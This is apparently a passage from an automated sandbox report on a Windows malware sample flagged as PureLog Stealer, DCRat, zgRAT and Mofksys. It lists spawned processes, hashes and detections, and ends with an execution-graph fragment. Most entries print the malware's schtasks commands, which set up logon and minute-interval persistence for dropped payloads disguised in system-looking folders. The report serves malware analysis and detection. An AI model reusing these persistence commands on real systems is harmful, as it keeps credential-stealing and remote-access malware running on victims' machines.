                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:12
                                                                                                                                                          Start time:07:17:17
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:13
                                                                                                                                                          Start time:07:17:17
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\blockcomSession\containerReview.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\blockcomSession/containerReview.exe"
                                                                                                                                                          Imagebase:0xd80000
                                                                                                                                                          File size:2'006'016 bytes
                                                                                                                                                          MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000000.1823570813.0000000000D82000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.1915424378.000000001346B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:14
                                                                                                                                                          Start time:07:17:17
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\windows\resources\themes\explorer.exe" RO
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:138'366 bytes
                                                                                                                                                          MD5 hash:7E24D6E5185E961528CFBCC6840EBBE9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000E.00000000.1826039246.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000E.00000002.1829239210.0000000000402000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:16
                                                                                                                                                          Start time:07:17:22
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\blockcomSession\Idle.exe'" /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:17
                                                                                                                                                          Start time:07:17:22
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\blockcomSession\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:18
                                                                                                                                                          Start time:07:17:22
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\blockcomSession\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:19
                                                                                                                                                          Start time:07:17:22
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline"
                                                                                                                                                          Imagebase:0x7ff6705d0000
                                                                                                                                                          File size:2'759'232 bytes
                                                                                                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:20
                                                                                                                                                          Start time:07:17:22
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:21
                                                                                                                                                          Start time:07:17:22
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8F5.tmp" "c:\Windows\System32\CSC8BED934F688E46C294B230B686E2243F.TMP"
                                                                                                                                                          Imagebase:0x7ff7dc3b0000
                                                                                                                                                          File size:52'744 bytes
                                                                                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:22
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 9 /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:23
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:24
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 10 /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:25
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\smss.exe'" /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:26
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\blockcomSession\smss.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:27
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\blockcomSession\smss.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:28
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:29
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:30
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 14 /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:31
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:32
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe"
                                                                                                                                                          Imagebase:0x2d0000
                                                                                                                                                          File size:2'006'016 bytes
                                                                                                                                                          MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                                                                          • Detection: 77%, Virustotal
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:33
                                                                                                                                                          Start time:07:17:23
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:34
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                                                                                                                                          Imagebase:0x8e0000
                                                                                                                                                          File size:2'006'016 bytes
                                                                                                                                                          MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                                                                          • Detection: 77%, Virustotal, Browse
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:35
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 11 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:36
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\blockcomSession\Idle.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\blockcomSession\Idle.exe
                                                                                                                                                          Imagebase:0xb40000
                                                                                                                                                          File size:2'006'016 bytes
                                                                                                                                                          MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\Idle.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\Idle.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:37
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\blockcomSession\Idle.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\blockcomSession\Idle.exe
                                                                                                                                                          Imagebase:0x1c0000
                                                                                                                                                          File size:2'006'016 bytes
                                                                                                                                                          MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:38
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 11 /tr "'C:\blockcomSession\containerReview.exe'" /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:39
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\blockcomSession\smss.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\blockcomSession\smss.exe
                                                                                                                                                          Imagebase:0xc00000
                                                                                                                                                          File size:2'006'016 bytes
                                                                                                                                                          MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\smss.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\smss.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:40
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:41
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\blockcomSession\smss.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\blockcomSession\smss.exe
                                                                                                                                                          Imagebase:0xc70000
                                                                                                                                                          File size:2'006'016 bytes
                                                                                                                                                          MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:42
                                                                                                                                                          Start time:07:17:24
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 9 /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f
                                                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:6.7%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:1.1%
                                                                                                                                                            Signature Coverage:8.5%
                                                                                                                                                            Total number of Nodes:1667
                                                                                                                                                            Total number of Limit Nodes:45
41000c #616 __vbaStrMove __vbaFreeStr 5030->5032 5032->5029 5033->4971 5035 412590 __vbaErrorOverflow 5034->5035 5036 41249c 5034->5036 5036->5035 5037 4124a5 5036->5037 5038 4124b5 7 API calls 5037->5038 5039 41252c __vbaI2I4 __vbaFileClose 5037->5039 5041 40ee70 24 API calls 5038->5041 5040 412567 __vbaFreeStr __vbaFreeStr 5039->5040 5040->4990 5042 412521 __vbaStrMove 5041->5042 5042->5039 5044 412ec1 5043->5044 5045 412e59 __vbaRecUniToAnsi __vbaStrToAnsi 5043->5045 5047 414b58 __vbaI2I4 __vbaFileClose __vbaExitProc 5044->5047 5048 412eca __vbaRecUniToAnsi __vbaStrToAnsi 5044->5048 5300 405d50 5045->5300 5049 414d3e __vbaAryDestruct __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 5047->5049 5051 405d50 5048->5051 5049->5020 5053 412f06 __vbaSetSystemError __vbaRecAnsiToUni 5051->5053 5052 412f30 __vbaStrToUnicode __vbaFreeStr 5054 412f50 5052->5054 5053->5052 5055 412f56 __vbaHresultCheckObj 5054->5055 5056 412f68 __vbaI2I4 5054->5056 5055->5056 5057 412f7f 5056->5057 5058 412f85 __vbaHresultCheckObj 5057->5058 5059 412f97 5057->5059 5058->5059 5060 414d8a __vbaErrorOverflow 5059->5060 5061 412fd0 __vbaHresultCheckObj 5059->5061 5062 412fe2 5059->5062 5061->5062 5062->5060 5063 413018 __vbaHresultCheckObj 5062->5063 5064 41302a 5062->5064 5063->5064 5065 41303d __vbaHresultCheckObj 5064->5065 5066 41304f 5064->5066 5065->5066 5067 413073 5066->5067 5068 413064 __vbaHresultCheckObj 5066->5068 5069 413097 __vbaHresultCheckObj 5067->5069 5070 4130a9 5067->5070 5068->5067 5069->5070 5071 4130c7 __vbaSetSystemError 5070->5071 5071->5047 5072 4130e1 5071->5072 5073 4130f2 __vbaHresultCheckObj 5072->5073 5074 413104 5072->5074 5073->5074 5075 413110 __vbaSetSystemError 5074->5075 5075->5060 5076 413125 __vbaRedim 5075->5076 5076->5060 5077 41314c __vbaI2I4 5076->5077 5087 413164 5077->5087 5078 41341a 5078->5060 5079 413db2 __vbaStrCat __vbaStrMove #537 5078->5079 5081 413434 __vbaI2I4 5078->5081 5079->5060 5082 413e00 5079->5082 5080 41317f __vbaI2I4 5080->5087 
